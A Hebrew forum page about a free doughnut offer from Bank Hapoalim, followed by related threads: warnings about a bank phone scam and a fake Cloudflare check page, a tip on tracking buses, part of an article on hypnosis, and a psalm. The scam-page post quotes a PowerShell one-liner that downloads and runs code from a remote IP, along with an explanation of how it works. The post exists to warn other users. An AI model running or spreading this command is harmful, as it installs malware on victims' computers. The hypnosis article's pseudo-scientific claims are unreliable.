מידע שימושי מארז סופגניות בחינם זמין להורדה באתר פועלים

  • הוסף לסימניות
  • #1
מוגבל ל 5000 ראשונים
עכשיו זה עדיין עובד

1608108962920.png
 
  • הוסף לסימניות
  • #2
איזה הכשר?
 
  • הוסף לסימניות
  • #3
שלחו לי בסמס למספר כשר
איך אפשר לקבל את הקופון?
 

פרוגבוט

תוכן שיווקי
פרסומת

אשכולות דומים

פורסם אצלנו במייל:

עוקץ מתוחכם בניסיון פריצה לחשבון בנק

תקראו עד הסוף!

אתמול קיבלתי הודעה מבנק הפועלים עם קוד אימות לכניסה, למרות שלא ניסינו להיכנס- מישהו ניסה לפרוץ לחשבון.
ישר נכנסתי לאפליקציה עצמאית והחלפתי סיסמה, הוספתי אימות דו שלבי.

היום בצהריים מתקשר מישהו מהמספר 073-3632614 ומציג את עצמו "ממחלקת הביטחון של בנק הפועלים, יש ניסיון פריצה לחשבון". שואל אם מדבר עם מיכל ומבקש את מספר הת.ז שלי לאימות. עניתי לו "לא הבנתי, אתה התקשרת אליי, למה אתה צריך את הפרטים שלי?"

הוא אמר לי בעצמו את מספר הת.ז שלי "יש מולי הכל", אז אמרתי לו "אוקיי אתה לא צריך את זה ממני אם ככה".
התחיל להגיד שהוא חייב לזהות אותי כדי לוודא שהוא מדבר איתי, אמרתי לו שאני לא מוסרת פרטים בטלפון ומוכנה להזדהות רק דרך המערכת של הבנק כמו תמיד.

אז הוא אמר שהוא שולח לי הודעת סמס מהמערכת של הבנק. לקח לה הרבה זמן להגיע (מה שבדר"כ מגיע מיד), היא הופיעה תחת השרשור הרגיל שמזוהה "בנק הפועלים" עם כל ההודעות של הריביות, קודי אימות והכל- כביכול הכי לגיטימי! ועדיין משהו הרגיש לי לא בסדר. אמרתי לו שלא ככה אני מזדהה מול הבנק ואני לא מוסרת פרטים. אמר שהוא יאפס לי שם משתמש וסיסמה כדי שאוכל להתחבר, צעקתי עליו "בשום אופן לא! אני אעשה את זה בעצמי דרך האפליקציה!" אז הוא אמר שהוא חוסם את החשבון לפעולות וניתקנו.

התקשרתי למוקד הונאות של בנק הפועלים והנציגה מיד אמרה לי שזה היה ניסיון עוקץ וכל הכבוד שלא מסרתי לו שום פרט, כי השיחה הקודמת שלה הייתה עם מישהי שנגנבו לה ככה 5000 שח מהחשבון
הייתי איתם עכשיו חצי שעה על הקו לתחקיר של האירוע.


בעלי שנכח בשיחה בעצמו אמר שהיה נופל בזה בלי לחשוד, ועוד אמר שהייתי לא נחמדה למישהו שמנסה לעזור לי..

תיזהרו ותזהרו אנשים אחרים בעיקר אנשים מבוגרים שלא יפלו לעוקץ המתוחכם
פתרון למעקב אחרי אוטובוסים ומציאת חפצים אבודים
אבידות באוטובוסים הן תופעה נפוצה: ארנקים, מזוודות וחפצים קטנים נשכחים לעיתים קרובות, והנוסעים לא תמיד יודעים כיצד לאתר את האוטובוס שבו נותר הפריט. מצב זה יוצר חוסר נוחות ומבזבז זמן רב.

כיום, באמצעות האתר
דאטאבוס, ניתן לעקוב אחרי אוטובוסים ולנסות לאתר חפצים אבודים:
  1. נכנסים ל"מפה על פי קו" באתר ובוחרים את קו האוטובוס, חברת התחבורה והשעה המשוערת שהאוטובס יצאה.
  2. האתר מציג את מספר הרישוי של האוטובוס שנע באותו קו.
  3. לאחר מכן, ניתן להיכנס לחיפוש לפי מספר הרכב, ולבדוק את הנסיעות של האוטובוס בימים האחרונים. רוב הנסיעות הן קבועות, כלומר אם האוטובוס עבר במסלול מסוים ביום ראשון, סביר להניח שהוא יעבור באותו מסלול גם בימים אחרים בשבוע.
  4. בעזרת מידע זה, ניתן לתכנן להגיע לתחנה שבה צפויה הנסיעה הבאה של האוטובוס, לעלות עליו, ולנסות לאתר את החפץ שנשכח.
חשוב לדעת: ייתכן שהנהג כבר ביצע סיור באוטובוס והוציא את החפץ, אך לרוב יש לאוטובוס נסיעות נוספות באותו יום, ולכן ההמלצה היא לפעול ככל האפשר במהירות כדי לעלות על הנסיעה הבאה ולאתר את הפריט לפני שהיום מסתיים.
אני רק עכשיו גיליתי את האתר הזה, ולכן החפץ שלי לא נמצא – כבר היה יום אחרי. ניסיתי את מזלי, עליתי לאותו אוטובוס ובדקתי, אבל הפריט כבר לא היה עליו. בינתיים אני עדיין מחפש אותו.

לכן, בשביל לעזור לציבור, חשוב לדעת: אם הייתי יודע על האתר בזמן אמת, הייתי מתקשר לחבר לבדוק איפה הנסיעה הבאה של האוטובוס, כי חברות התחבורה לרוב לא יודעות בדיוק איפה האוטובוס נמצא והמידע שהן מספקות מוגבל.

אז תזכרו: אם אי פעם תאבדו משהו באוטובוס, יש פתרון שיכול באמת לעזור, ואם פועלים במהירות, הסיכוי לאתר את הפריט גבוה הרבה יותר
אני משתף את החוויה שלי כדי שמישהו אחר יוכל למצוא את מה שהוא איבד במהירות. אל תתייאשו. השתמשו באתר, עקבו אחרי האוטובוס בזמן הקרוב, ותנסו לפעול מהר. זה יכול לחסוך זמן ולהגדיל את הסיכוי למצוא את הפריט שלכם.– הוא באמת יכול לעזור!
לכניסה לאתר

יש בזה עוד הרבה פונקציות שוות
ניסיתי להכנס לאתר של הרב אפרתי - נותן הכשרות
לאחר לחיצה על סימון - אתה לא רובוט...

הופתעתי מאוד לראות את זה:
1773765478164.png
נראה חשוד!

מאוד חשוד!!!

‫Gemini אמר​

אזהרה: מדובר בהונאה ובתוכנה זדונית (Malware)

התמונה שצירפת מציגה דף מזויף שמתחזה לשירות ההגנה Cloudflare, אך למעשה מדובר בשיטה להרצת קוד זדוני על המחשב שלך.

למה זה מסוכן?

ההוראות בתמונה מבקשות ממך לבצע רצף פעולות חריג מאוד:
  1. צירוף המקשים Win + R: פותח את חלון ה-"הפעלה" (Run) של ווינדוס, שמשמש להרצת פקודות מערכת.
  2. צירוף המקשים Ctrl + V: מדביק פקודה שהאתר העתיק ללוח הגזירים (Clipboard) שלך באופן אוטומטי ברגע שנכנסת לדף או לחצת על כפתור.
  3. לחיצה על OK: מריצה את הפקודה המודבקת.
מה קורה בפועל?ברגע שתלחץ על OK, המחשב יריץ פקודה (בדרך כלל פקודת PowerShell) שמורידה ומתקינה וירוס, תוכנת כופר או תוכנה לגניבת סיסמאות ופרטי בנק. אף שירות אימות לגיטימי (כמו Cloudflare) לא יבקש ממך להריץ פקודות ידניות בחלון ה-Run של המערכת.



מה עליך לעשות?

  • אל תבצע את ההוראות: אל תקיש על שום שילוב מקשים ואל תדביק דבר.
  • סגור את הלשונית מיד: צא מהאתר הזה ואל תחזור אליו.
  • סריקת וירוסים: מומלץ להריץ סריקה מלאה של האנטי-וירוס במחשב שלך (כמו Windows Defender או תוכנה מוכרת אחרת) ליתר ביטחון.
  • ניקוי היסטוריה: כדאי לנקות את הקבצים הזמניים והקוקיז בדפדפן.

בדקתי בלוח מה הפקודה שהוא רצה שאני אריץ במחשב....
זה הפקודה: powershell -c iex(irm 158.94.209.33 -UseBasicParsing) - סכנה! לא להריץ בשום אופן!!!!

תקראו טוב מה גיימני כותב שזה עושה למחשב שלכם...

זהירות! מדובר בתוכנה זדונית (Malware) ודאית.

הפקודה שהעתקת היא הוכחה חותכת לכך שמדובר בניסיון פריצה. בוא נפרק את הפקודה כדי שתבין בדיוק מה היא מנסה לעשות למחשב שלך:

  • powershell: מפעיל את ממשק הפקודות המתקדם של ווינדוס. לממשק זה יש הרשאות עמוקות לשינוי הגדרות מערכת.
  • iex (Invoke-Expression): פקודה שאומרת למחשב: "כל מה שתקבל בהמשך – תריץ אותו כקוד עכשיו".
  • irm (Invoke-RestMethod): פקודה להורדת תוכן מהאינטרנט.
  • 158.94.209.33: זוהי כתובת IP של שרת מרוחק (שאינו קשור ל-Cloudflare). הפקודה מנסה למשוך קובץ "תסריט" (Script) מהשרת הזה.
  • -UseBasicParsing: הוראה לדפדפן הפנימי להתעלם מבדיקות תאימות ולהריץ את הקוד במהירות.



מה המשמעות?

ברגע שהיית לוחץ על OK, המחשב שלך היה פונה לכתובת ה-IP הזו, מוריד קוד זדוני (כמו סוס טרויאני או תוכנת כופר) ומריץ אותו מיד ברקע, בלי שתראה חלון נוסף או אזהרה.

צעדים דחופים אם כבר הרצת את הפקודה:

  1. ניתוק מהאינטרנט: כבה את ה-Wi-Fi או נתק את כבל הרשת מיד כדי למנוע מהווירוס לשלוח מידע החוצה או להוריד רכיבים נוספים.
  2. סריקה במצב בטוח: הפעל את המחשב ב-"מצב בטוח" (Safe Mode) והרץ סריקה מלאה של אנטי-וירוס מעודכן.
  3. שינוי סיסמאות: ממכשיר אחר (טלפון או מחשב נקי), שנה סיסמאות לחשבונות רגישים (מייל, בנק, רשתות חברתיות).




מסקנה:

זהירות!!!
אני יודע שהמאמר קצת ארוך, אבל הוא שווה את זה!

המאמר משתף אתכם בידע שמתי מעט יודעים אותו.

למי שרוצה
כאן השאלות הידועות והמחשבות הקדומות על היפנוזה.

אז קדימה,

מתחילים!

היפנוזה!

מה אנחנו יודעים עלייך?


זה שנים רבות מסעירה ההיפנוזה את דעתו של כל מי ששמע עליה.

נשמעת כמו קסם יותר מאשר כמדע.

ונתונה למחלוקת רבה בדעתם של האנשים...

אבל מה באמת אנחנו יודעים עליה? לא הרבה יותר ממה שאמרו לנו...

אנשים רבים מפחדים מהיפנוזה, אבל האם יש צדק בפחד הזה?

האם היא לא הצטיירה כמפלצתית מדי?

אז בוא נפתח את כל הקלפים!
  • מהי היפנוזה?
  • מהי מדיטציה?
  • מהו דמיון מודרך?
  • איך הם קשורים?
  • ואיך כל זה קשור לשיטת הטיפול NLP?

מהי היפנוזה?

במשמעות הדבר היפנוזה היא תהליך כדי לגרום לשינויים בתת-מודע, שינויים שבמצב רגיל לא ניתן לעשות אותם בקלות.

אבל איך זה עובד?

בשביל זה נגדיר קצת את המודע ואת התת-מודע:

המוח שלנו מחולק לשני חלקים עיקריים: המודע והתת-מודע,

(ישנו עוד חלק ה"לא-מודע" שאחראי לתהליכים הפיזיולוגיים והביולוגיים, אבל הוא לא הנידון כרגע).

המודע הינו בסך הכול כ-5 אחוזים מהמוח בלבד, וכל השאר זה התת-מודע.

בקצרה: למודע ישנם 4 תפקידים עיקריים:

  1. "המוח האנליטי" החלק בנו שמנתח נתונים, משווה אותם וכו'.
  2. "הרציונל" שזה בעצם ההיגיון.
  3. "זיכרון לטווח קצר" כפשוטו.
  4. "כוח הרצון" הכוח שמניע אותנו להתחיל דברים.
לתת-מודע נשאר כל השאר:

זיכרון לטווח ארוך, רגשות, רצונות, אמונות, ערכים, ידיעות וכו'.

כל מה שאנחנו עושים/מרגישים/שומעים/רואים ולא שמים לב אליו (לדוגמה נשימות, תחושת מנח כף הרגל בנעל וכו'), נמצא בתת-מודע,

וכל מה שאנחנו עושים/מרגישים/שומעים/רואים ושמים לב אליו - זה נמצא במודע.

לתת-מודע אין שום היגיון או מוח מנתח, ואם נצליח להחדיר אליו "סוגסטיה" (כלומר הצעה), היא תתקבל (כמעט) בלי עוררין.

לדוגמה: אם נצליח להחדיר לשם שסיגריות הן דבר מגעיל, אז האדם כבר לא יוכל לראות סיגריות.

אבל הקב"ה לא השאיר אותנו חשופים,

ויצר בנו את "הגורם הביקורתי".

הוא השומר שמחליט איזה מידע נכנס לתת-מודע ואיזה לא.

כדי לעשות את תפקידו נאמנה משתמש הגורם הביקורתי בכל הכלים של המודע, ומנתח את הנתון החדש: בודק אם הוא הגיוני, ואז משווה אותו למידע שכבר נמצא בתת-מודע.

אם הנתון לא מסתדר הגיונית או לא תואם מידע שכבר נמצא, אז השומר פשוט לא נותן לו להיכנס!

ולכן כל מעשן שתגיד לו שסיגריות הן דבר מגעיל, זה אולי יחדור למודע שלו, אבל התת-מודע שמנהל לו את הרגשות והרצונות לא יאמין לזה.

חשוב להדגיש שהגורם הביקורתי הוא חלק מהמודע, ולא מהתת-מודע.

בעצם התפקיד שלנו בהיפנוזה הוא לעקוף את אותו "גורם ביקורתי".

אז איך עושים את זה?

יש בזה שתי גישות עיקריות: הגישה הקלאסית והגישה האריקסונית.

בקצרה:

  • הגישה האריקסונית: בשונה מהגישה הקלאסית, היא לא מנסה "להרדים" את הגורם הביקורתי, אלא להתחמק ממנו.
היא נקראת גם שיטת הערפול, ומשתמשת בשיטות מיוחדות כדי להסיח את המודע ואת ה"גורם הביקורתי", ומתחת לפני השטח להשחיל "סוגסטיה" (הצעה).

כרגע נתמקד יותר בגישה הקלאסית:

בגישה הקלאסית
: הרעיון הוא להרדים את המודע, וכך גם את הגורם הביקורתי.

המודע והתת-מודע פועלים כמו מאזניים: כשהמודע בשיא פעילותו התת-מודע מתחבא עמוק עמוק, אבל כשהמודע יורד – התת-מודע נחשף.

לדוגמה, חלומות נובעים מהתת-מודע והם מגיעים במצב שבו המודע חלש מאוד.

לכן הדרך שלנו לחשוף את התת-מודע היא להרחיק את המודע – פשוט להירגע. כן!

ההיפנוזה שכולם רועשים ממנה היא בסך הכול רגיעה!

אבל כדי להגיע לשינויים עוצמתיים צריך רגיעה עוצמתית,

ופה נכנס שלב ה"אינדוקציות" – שזה תהליך איך לעזור לאדם להגיע לרגיעה עוצמתית.

(אם תבקשו אולי אני אכתוב גם על זה מאמר).

אך אל דאגה, גם ברגיעה העוצמתית ביותר תמיד המודע עדיין נוכח. בלתי אפשרי להגיע למצב שבו המודע לא נוכח בכלל,

ואם כן, דבר שינגוד את רצונו של האדם לעולם לא יוכל לחדור פנימה גם במצב של היפנוזה! כפי שנרחיב בהמשך.




רמות פעילות המוח

ושוב בקצרה:

המוח עובד על גלי חשמל בתדרים מסוימים; ככל שהגלים מהירים יותר, זה מראה שהמוח פעיל יותר.

  • גלי ביתא: המצב שבו המוח נמצא רוב היום – פעילות אינטנסיבית ומחשבה רודפת מחשבה.


  • גלי אלפא: המצב של המוח כשהוא ברגיעה קלה או בהתרכזות (פעילות נמוכה יותר), כמו בקריאת ספר, שחמט או שמיעת מוזיקה.


  • גלי תטא: מצב של רגיעה עמוקה. בשלב הזה המחשבות איטיות מאוד ומעורפלות. זה המצב של המוח כשאנחנו חולמים, וכן כמה שניות לפני שינה.


  • גלי דלתא: גלי מוח איטיים ביותר, כמעט ואין מחשבות. זה המצב של המוח כשאנחנו ישנים.
בהיפנוזה אנחנו מחפשים להגיע לגלי תטא, או לפחות לגלי אלפא.

בקיצור: התחושה במצב ההיפנוטי דומה לתחושה של הרגעים האחרונים לפני שינה.

בשלב הזה התת-מודע הרבה יותר נגיש, והמודע עם הגורם הביקורתי הרבה פחות ביקורתיים, וכך נוצר מצב שבו התת-מודע גמיש ומוכן לשינויים.




מה זה מדיטציה ודמיון מודרך?

למען האמת, גם מדיטציה ודמיון מודרך הם מצב היפנוטי לכל דבר, אם כי בדרך כלל הם נעשים ברמה יותר חלשה של רגיעה (גלי אלפא).

ההיפנוזה שקוראים לה "היפנוזה" היא בדרך כלל בגלי תטא.

עכשיו אנחנו מבינים שאין הרבה מה לפחד בהיפנוזה; אדם נכנס למצב היפנוטי בין 7 ל-12 פעמים ביום וזה תהליך טבעי לחלוטין.

אבל רגע לפני שנשפוט – נעבור לשאלות המעניינות...

הצטרפות לניוזלטר

איזה כיף שהצטרפתם לניוזלטר שלנו!

מעכשיו, תהיו הראשונים לקבל את כל העדכונים, החדשות, ההפתעות בלעדיות, והתכנים הכי חמים שלנו בפרוג!

לוח מודעות

הפרק היומי

הפרק היומי! כל ערב פרק תהילים חדש. הצטרפו אלינו לקריאת תהילים משותפת!


תהילים פרק כה

אלְדָוִד אֵלֶיךָ יי נַפְשִׁי אֶשָּׂא:באֱלֹהַי בְּךָ בָטַחְתִּי אַל אֵבוֹשָׁה אַל יַעַלְצוּ אֹיְבַי לִי:גגַּם כָּל קוֶֹיךָ לֹא יֵבֹשׁוּ יֵבֹשׁוּ הַבּוֹגְדִים רֵיקָם:דדְּרָכֶיךָ יי הוֹדִיעֵנִי אֹרְחוֹתֶיךָ לַמְּדֵנִי:ההַדְרִיכֵנִי בַאֲמִתֶּךָ וְלַמְּדֵנִי כִּי אַתָּה אֱלֹהֵי יִשְׁעִי אוֹתְךָ קִוִּיתִי כָּל הַיּוֹם:וזְכֹר רַחֲמֶיךָ יי וַחֲסָדֶיךָ כִּי מֵעוֹלָם הֵמָּה:זחַטֹּאות נְעוּרַי וּפְשָׁעַי אַל תִּזְכֹּר כְּחַסְדְּךָ זְכָר לִי אַתָּה לְמַעַן טוּבְךָ יי:חטוֹב וְיָשָׁר יי עַל כֵּן יוֹרֶה חַטָּאִים בַּדָּרֶךְ:טיַדְרֵךְ עֲנָוִים בַּמִּשְׁפָּט וִילַמֵּד עֲנָוִים דַּרְכּוֹ:יכָּל אָרְחוֹת יי חֶסֶד וֶאֱמֶת לְנֹצְרֵי בְרִיתוֹ וְעֵדֹתָיו:יאלְמַעַן שִׁמְךָ יי וְסָלַחְתָּ לַעֲוֹנִי כִּי רַב הוּא:יבמִי זֶה הָאִישׁ יְרֵא יי יוֹרֶנּוּ בְּדֶרֶךְ יִבְחָר:יגנַפְשׁוֹ בְּטוֹב תָּלִין וְזַרְעוֹ יִירַשׁ אָרֶץ:ידסוֹד יי לִירֵאָיו וּבְרִיתוֹ לְהוֹדִיעָם:טועֵינַי תָּמִיד אֶל יי כִּי הוּא יוֹצִיא מֵרֶשֶׁת רַגְלָי:טזפְּנֵה אֵלַי וְחָנֵּנִי כִּי יָחִיד וְעָנִי אָנִי:יזצָרוֹת לְבָבִי הִרְחִיבוּ מִמְּצוּקוֹתַי הוֹצִיאֵנִי:יחרְאֵה עָנְיִי וַעֲמָלִי וְשָׂא לְכָל חַטֹּאותָי:יטרְאֵה אוֹיְבַי כִּי רָבּוּ וְשִׂנְאַת חָמָס שְׂנֵאוּנִי:כשָׁמְרָה נַפְשִׁי וְהַצִּילֵנִי אַל אֵבוֹשׁ כִּי חָסִיתִי בָךְ:כאתֹּם וָיֹשֶׁר יִצְּרוּנִי כִּי קִוִּיתִיךָ:כבפְּדֵה אֱלֹהִים אֶת יִשְׂרָאֵל מִכֹּל צָרוֹתָיו:
נקרא  2  פעמים
למעלה